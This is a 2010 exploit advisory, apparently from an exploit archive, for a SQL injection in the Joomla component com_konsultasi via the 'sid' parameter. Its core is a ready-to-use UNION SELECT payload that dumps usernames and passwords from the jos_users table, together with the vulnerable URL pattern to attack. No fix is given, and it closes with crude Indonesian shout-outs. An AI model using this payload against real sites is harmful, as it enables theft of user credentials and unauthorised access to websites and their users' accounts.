Joomla Component com_konsultasi SQL Injection Vulnerability

2010-05-13 10:03:42

-------------------------------------------------------------------------
Joomla Component com_konsultasi (sid) SQL Injection Vulnerability
-------------------------------------------------------------------------
Author : c4uR
Date : May, 13, 2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
-------------------------------------------------------------------------

Esploit :
----------

-5/**/union/**/select/**/all/**/1,2,3,4,concat(username,0x3a,password)c4uR,6,7,8,9/**/from/**/jos_users--

SQLi p0c :
-----------

http://127.0.0.1/[gubrak]/index.php?option=com_konsultasi&act=detail&sid=[gubrak]
-------------------------------------------------------------------------

crott :
-----------

[+] Malingsial sempak, crott... crott... crott...
[+] tian(tangannye jgn nakal)+GheMaX(byk

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.